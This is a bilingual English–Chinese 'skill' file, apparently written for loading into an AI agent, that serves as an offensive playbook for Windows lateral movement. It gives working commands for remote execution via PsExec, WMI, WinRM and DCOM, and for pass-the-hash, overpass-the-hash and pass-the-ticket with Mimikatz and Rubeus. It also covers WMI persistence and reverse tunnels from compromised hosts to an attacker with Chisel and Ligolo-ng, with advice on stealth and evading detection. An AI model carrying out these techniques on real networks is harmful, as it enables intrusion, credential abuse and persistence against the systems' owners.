windows-lateral-movement
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseSKILL: Windows Lateral Movement — Expert Attack Playbook
SKILL: Windows Lateral Movement — 专家级攻击手册
AI LOAD INSTRUCTION: Expert Windows lateral movement techniques. Covers PsExec, WMI, WinRM, DCOM, SMB, RDP, SSH, pass-the-hash, overpass-the-hash, pass-the-ticket, and pivoting. Base models miss execution method fingerprints, OPSEC trade-offs, and credential type requirements per method.
AI加载说明:专家级Windows横向移动技术,涵盖PsExec、WMI、WinRM、DCOM、SMB、RDP、SSH、哈希传递、密钥传递、票据传递以及跳转技术。基础模型缺少各方法的执行特征、OPSEC权衡以及对应凭证类型要求。
0. RELATED ROUTING
0. 关联技能引导
Before going deep, consider loading:
- windows-privilege-escalation after landing on a new host for local escalation
- windows-av-evasion when EDR blocks lateral movement tools
- active-directory-kerberos-attacks for Kerberos-based lateral (pass-the-ticket, delegation)
- active-directory-acl-abuse for ACL-based paths to new hosts
深入学习前,可考虑加载以下内容:
- windows-privilege-escalation 攻陷新主机后用于本地权限提升
- windows-av-evasion 当EDR拦截横向移动工具时使用
- active-directory-kerberos-attacks 用于基于Kerberos的横向移动(票据传递、委派)
- active-directory-acl-abuse 用于基于ACL的跨主机访问路径
Advanced Reference
进阶参考
Also load CREDENTIAL_DUMPING.md when you need:
- LSASS dump techniques (MiniDump, comsvcs.dll, nanodump)
- SAM/SYSTEM/SECURITY extraction
- DPAPI, credential manager, cached domain credentials
- NTDS.dit extraction methods
当你需要以下能力时也可加载CREDENTIAL_DUMPING.md:
- LSASS转储技术(MiniDump、comsvcs.dll、nanodump)
- SAM/SYSTEM/SECURITY 提取
- DPAPI、凭证管理器、缓存域凭证
- NTDS.dit 提取方法
1. REMOTE EXECUTION METHODS COMPARISON
1. 远程执行方法对比
| Method | Port | Cred Type | Creates Service? | File on Disk? | OPSEC | Admin Required? |
|---|---|---|---|---|---|---|
| PsExec | 445 (SMB) | Password/Hash | Yes (PSEXESVC) | Yes (.exe) | Low | Yes |
| Impacket smbexec | 445 | Password/Hash | Yes (temp service) | No | Medium | Yes |
| Impacket atexec | 445 | Password/Hash | No (scheduled task) | No | Medium | Yes |
| WMI | 135+dynamic | Password/Hash | No | No | High | Yes |
| WinRM | 5985/5986 | Password/Hash/Ticket | No | No | High | Yes (Remote Mgmt) |
| DCOM | 135+dynamic | Password/Hash | No | No | High | Yes |
| RDP | 3389 | Password/Hash (RestrictedAdmin) | No | No | Low (GUI session) | RDP access |
| SSH | 22 | Password/Key | No | No | High | SSH enabled |
| SC | 445 | Password/Hash | Yes (custom service) | Yes | Low | Yes |
| 方法 | 端口 | 凭证类型 | 是否创建服务? | 是否落盘文件? | OPSEC | 是否需要管理员权限? |
|---|---|---|---|---|---|---|
| PsExec | 445 (SMB) | 密码/哈希 | 是 (PSEXESVC) | 是 (.exe) | 低 | 是 |
| Impacket smbexec | 445 | 密码/哈希 | 是(临时服务) | 否 | 中 | 是 |
| Impacket atexec | 445 | 密码/哈希 | 否(计划任务) | 否 | 中 | 是 |
| WMI | 135+动态端口 | 密码/哈希 | 否 | 否 | 高 | 是 |
| WinRM | 5985/5986 | 密码/哈希/票据 | 否 | 否 | 高 | 是(远程管理权限) |
| DCOM | 135+动态端口 | 密码/哈希 | 否 | 否 | 高 | 是 |
| RDP | 3389 | 密码/哈希(受限管理员模式) | 否 | 否 | 低(GUI会话) | RDP访问权限 |
| SSH | 22 | 密码/密钥 | 否 | 否 | 高 | SSH已启用 |
| SC | 445 | 密码/哈希 | 是(自定义服务) | 是 | 低 | 是 |
2. PSEXEC VARIANTS
2. PSEXEC变种
Impacket PsExec
Impacket PsExec
bash
undefinedbash
undefinedWith password
密码认证
psexec.py DOMAIN/administrator:password@TARGET_IP
psexec.py DOMAIN/administrator:password@TARGET_IP
With NTLM hash (pass-the-hash)
NTLM哈希认证(哈希传递)
psexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
psexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
With Kerberos ticket
Kerberos票据认证
export KRB5CCNAME=admin.ccache
psexec.py -k -no-pass DOMAIN/administrator@target.domain.com
undefinedexport KRB5CCNAME=admin.ccache
psexec.py -k -no-pass DOMAIN/administrator@target.domain.com
undefinedImpacket smbexec (Stealthier — No Binary Upload)
Impacket smbexec(更隐蔽 - 无二进制文件上传)
bash
smbexec.py DOMAIN/administrator:password@TARGET_IP
smbexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IPbash
smbexec.py DOMAIN/administrator:password@TARGET_IP
smbexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IPImpacket atexec (Scheduled Task)
Impacket atexec(计划任务实现)
bash
atexec.py DOMAIN/administrator:password@TARGET_IP "whoami"
atexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP "whoami"bash
atexec.py DOMAIN/administrator:password@TARGET_IP "whoami"
atexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP "whoami"Sysinternals PsExec
Sysinternals PsExec
cmd
PsExec64.exe \\TARGET -u DOMAIN\administrator -p password cmd.exe
PsExec64.exe \\TARGET -s cmd.exe & REM Run as SYSTEM (-s)
PsExec64.exe \\TARGET -accepteula -s -d cmd.exe /c "C:\temp\payload.exe"cmd
PsExec64.exe \\TARGET -u DOMAIN\administrator -p password cmd.exe
PsExec64.exe \\TARGET -s cmd.exe & REM 以SYSTEM权限运行 (-s)
PsExec64.exe \\TARGET -accepteula -s -d cmd.exe /c "C:\temp\payload.exe"3. WMI LATERAL MOVEMENT
3. WMI横向移动
bash
undefinedbash
undefinedImpacket wmiexec
Impacket wmiexec
wmiexec.py DOMAIN/administrator:password@TARGET_IP
wmiexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
wmiexec.py DOMAIN/administrator:password@TARGET_IP
wmiexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP
With Kerberos
Kerberos认证
export KRB5CCNAME=admin.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@target.domain.com
```powershellexport KRB5CCNAME=admin.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@target.domain.com
```powershellPowerShell WMI process creation
PowerShell WMI创建进程
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred
WMI event subscription persistence
WMI事件订阅持久化
$filterArgs = @{
EventNamespace = 'root\cimv2'; Name = 'Updater';
QueryLanguage = 'WQL';
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs
---$filterArgs = @{
EventNamespace = 'root\cimv2'; Name = 'Updater';
QueryLanguage = 'WQL';
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs
---4. WINRM LATERAL MOVEMENT
4. WINRM横向移动
bash
undefinedbash
undefinedevil-winrm (from Linux — with password)
evil-winrm(Linux端使用 - 密码认证)
evil-winrm -i TARGET_IP -u administrator -p password
evil-winrm -i TARGET_IP -u administrator -p password
evil-winrm (with hash)
evil-winrm(哈希认证)
evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH
evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH
evil-winrm (with Kerberos)
evil-winrm(Kerberos认证)
evil-winrm -i target.domain.com -r DOMAIN.COM
```powershellevil-winrm -i target.domain.com -r DOMAIN.COM
```powershellPowerShell remoting
PowerShell远程管理
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred
Execute command remotely
远程执行命令
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }
Multiple targets simultaneously
同时批量执行多目标
Invoke-Command -ComputerName TARGET1,TARGET2 -Credential $cred -ScriptBlock { hostname; whoami }
---Invoke-Command -ComputerName TARGET1,TARGET2 -Credential $cred -ScriptBlock { hostname; whoami }
---5. DCOM LATERAL MOVEMENT
5. DCOM横向移动
Stealthy — uses legitimate COM objects, no service creation.
隐蔽性高:使用合法COM对象,无需创建服务。
MMC20.Application
MMC20.Application
powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\temp\out.txt","7")powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\temp\out.txt","7")ShellWindows
ShellWindows
powershell
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\temp\out.txt","C:\Windows\System32",$null,0)powershell
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\temp\out.txt","C:\Windows\System32",$null,0)ShellBrowserWindow
ShellBrowserWindow
powershell
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","TARGET"))
$com.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)powershell
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","TARGET"))
$com.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)Impacket dcomexec
Impacket dcomexec
bash
dcomexec.py DOMAIN/administrator:password@TARGET_IP
dcomexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP -object MMC20bash
dcomexec.py DOMAIN/administrator:password@TARGET_IP
dcomexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP -object MMC206. PASS-THE-HASH (PTH)
6. 哈希传递(PTH)
Use NTLM hash directly without knowing the plaintext password.
bash
undefined无需知晓明文密码,直接使用NTLM哈希进行认证。
bash
undefinedCrackMapExec — spray/check admin access
CrackMapExec - 批量喷洒/校验管理员权限
crackmapexec smb TARGETS -u administrator -H NTLM_HASH
crackmapexec smb TARGETS -u administrator -H NTLM_HASH
Impacket tools (all support -hashes)
Impacket全工具支持 -hashes参数
psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
evil-winrm
evil-winrm
evil-winrm -i TARGET -u user -H NTLM_HASH
evil-winrm -i TARGET -u user -H NTLM_HASH
xfreerdp (Restricted Admin mode must be enabled)
xfreerdp(需要目标开启受限管理员模式)
xfreerdp /v:TARGET /u:administrator /pth:NTLM_HASH /d:DOMAIN
```cmdxfreerdp /v:TARGET /u:administrator /pth:NTLM_HASH /d:DOMAIN
```cmdMimikatz PTH (spawns new process with injected creds)
Mimikatz哈希传递(注入凭证生成新进程)
sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:HASH /run:cmd.exe
undefinedsekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:HASH /run:cmd.exe
undefinedEnable Restricted Admin for RDP PTH
开启RDP哈希传递所需的受限管理员模式
cmd
undefinedcmd
undefinedOn target (requires admin): enable restricted admin
目标端操作(需要管理员权限):开启受限管理员
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
---reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
---7. OVERPASS-THE-HASH (PASS-THE-KEY)
7. 密钥传递(Overpass-the-Hash/Pass-the-Key)
Convert NTLM hash → Kerberos TGT → pure Kerberos authentication.
bash
undefined将NTLM哈希转换为Kerberos TGT,实现纯Kerberos认证。
bash
undefinedRequest TGT with hash
用哈希申请TGT
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
Or with AES256 key
或使用AES256密钥
getTGT.py DOMAIN/user -aesKey AES256_KEY -dc-ip DC_IP
getTGT.py DOMAIN/user -aesKey AES256_KEY -dc-ip DC_IP
Use Kerberos for all subsequent tools
后续所有工具都使用Kerberos认证
psexec.py -k -no-pass DOMAIN/user@target.domain.com
wmiexec.py -k -no-pass DOMAIN/user@target.domain.com
```cmdpsexec.py -k -no-pass DOMAIN/user@target.domain.com
wmiexec.py -k -no-pass DOMAIN/user@target.domain.com
```cmdMimikatz overpass-the-hash
Mimikatz密钥传递
sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe
sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe
New PowerShell session → klist shows Kerberos TGT
新PowerShell会话执行klist可查看Kerberos TGT
**Advantage**: Pure Kerberos auth avoids NTLM logging and detection.
---
**优势**:纯Kerberos认证可避免NTLM日志记录与检测。
---8. PASS-THE-TICKET
8. 票据传递(PTT)
bash
undefinedbash
undefinedUse existing .ccache ticket
使用已有的.ccache票据
export KRB5CCNAME=/path/to/admin.ccache
psexec.py -k -no-pass DOMAIN/admin@target.domain.com
```cmdexport KRB5CCNAME=/path/to/admin.ccache
psexec.py -k -no-pass DOMAIN/admin@target.domain.com
```cmdMimikatz — inject .kirbi ticket
Mimikatz - 注入.kirbi票据
kerberos::ptt ticket.kirbi
kerberos::ptt ticket.kirbi
Verify
校验结果
klist
klist
Rubeus
Rubeus
Rubeus.exe ptt /ticket:base64_blob
---Rubeus.exe ptt /ticket:base64_blob
---9. PIVOTING THROUGH COMPROMISED HOSTS
9. 已攻陷主机跳转
SSH Tunnel / Port Forward
SSH隧道/端口转发
bash
undefinedbash
undefinedDynamic SOCKS proxy through compromised host
通过已攻陷主机搭建动态SOCKS代理
ssh -D 1080 user@COMPROMISED_HOST
ssh -D 1080 user@COMPROMISED_HOST
Use with proxychains
配合proxychains使用
Local port forward (access internal service)
本地端口转发(访问内部服务)
ssh -L 8888:INTERNAL_TARGET:445 user@COMPROMISED_HOST
undefinedssh -L 8888:INTERNAL_TARGET:445 user@COMPROMISED_HOST
undefinedChisel (No SSH Needed)
Chisel(无需SSH)
bash
undefinedbash
undefinedOn attacker (server)
攻击端(服务端)
chisel server --reverse -p 8080
chisel server --reverse -p 8080
On compromised host (client)
已攻陷主机(客户端)
chisel client ATTACKER:8080 R:socks
chisel client ATTACKER:8080 R:socks
Creates SOCKS5 proxy on attacker's port 1080
攻击端1080端口生成SOCKS5代理
undefinedundefinedLigolo-ng (Modern, Fast)
Ligolo-ng(现代高速工具)
bash
undefinedbash
undefinedOn attacker
攻击端操作
ligolo-proxy -selfcert -laddr 0.0.0.0:11601
ligolo-proxy -selfcert -laddr 0.0.0.0:11601
On compromised host
已攻陷主机操作
ligolo-agent -connect ATTACKER:11601 -retry -ignore-cert
ligolo-agent -connect ATTACKER:11601 -retry -ignore-cert
In ligolo console
ligolo控制台操作
session # Select agent
start # Start tunnel
session # 选择代理节点
start # 启动隧道
Add route: sudo ip route add INTERNAL_SUBNET/24 dev ligolo
添加路由:sudo ip route add INTERNAL_SUBNET/24 dev ligolo
---
---10. LATERAL MOVEMENT DECISION TREE
10. 横向移动决策树
Have credentials / hash — need to move laterally
│
├── What credentials do you have?
│ ├── Plaintext password → any method
│ ├── NTLM hash → PTH methods (§6)
│ │ ├── Need stealthier? → Overpass-the-Hash first (§7)
│ │ └── Direct use → psexec/wmiexec/evil-winrm with -H
│ ├── Kerberos ticket → Pass-the-Ticket (§8)
│ └── AES key → Overpass-the-Hash with -aesKey (§7)
│
├── OPSEC priority?
│ ├── High stealth needed
│ │ ├── WMI (no file on disk, no service) → wmiexec (§3)
│ │ ├── DCOM (uses legitimate COM) → dcomexec (§5)
│ │ └── WinRM (PowerShell remoting) → evil-winrm (§4)
│ ├── Moderate stealth
│ │ ├── smbexec (no binary upload) (§2)
│ │ └── atexec (scheduled task, auto-cleanup) (§2)
│ └── Low stealth acceptable
│ ├── PsExec (reliable, creates service) (§2)
│ └── RDP (interactive GUI) (§6)
│
├── Need to pivot to internal network?
│ ├── SSH available → SSH tunnel / SOCKS (§9)
│ ├── No SSH → Chisel or Ligolo-ng (§9)
│ └── Multiple hops → chain SOCKS proxies
│
├── Target hardening?
│ ├── SMB signing required → WMI, WinRM, or DCOM
│ ├── WinRM disabled → WMI or DCOM
│ ├── Firewall blocks 135/445 → RDP or SSH
│ └── Restricted Admin disabled → no RDP PTH → use other methods
│
└── Need to dump creds on new host?
└── Load CREDENTIAL_DUMPING.md已有凭证/哈希,需要进行横向移动
│
├── 你拥有哪种凭证?
│ ├── 明文密码 → 任意方法
│ ├── NTLM哈希 → 哈希传递方法(§6)
│ │ ├── 需要更高隐蔽性? → 先执行密钥传递(§7)
│ │ └── 直接使用 → 带-H参数的psexec/wmiexec/evil-winrm
│ ├── Kerberos票据 → 票据传递(§8)
│ └── AES密钥 → 带-aesKey参数的密钥传递(§7)
│
├── OPSEC优先级?
│ ├── 需要高隐蔽性
│ │ ├── WMI(无文件落盘、无服务创建)→ wmiexec(§3)
│ │ ├── DCOM(使用合法COM对象)→ dcomexec(§5)
│ │ └── WinRM(PowerShell远程管理)→ evil-winrm(§4)
│ ├── 中等隐蔽性
│ │ ├── smbexec(无二进制上传)(§2)
│ │ └── atexec(计划任务、自动清理)(§2)
│ └── 可接受低隐蔽性
│ ├── PsExec(稳定可靠、创建服务)(§2)
│ └── RDP(交互式GUI)(§6)
│
├── 需要跳转至内部网络?
│ ├── 可用SSH → SSH隧道/SOCKS代理(§9)
│ ├── 无SSH → Chisel或Ligolo-ng(§9)
│ └── 多跳场景 → 链式SOCKS代理
│
├── 目标有安全加固?
│ ├── 要求SMB签名 → WMI、WinRM或DCOM
│ ├── WinRM已禁用 → WMI或DCOM
│ ├── 防火墙拦截135/445端口 → RDP或SSH
│ └── 受限管理员模式已关闭 → 无法使用RDP哈希传递 → 改用其他方法
│
└── 需要在新主机转储凭证?
└── 加载CREDENTIAL_DUMPING.md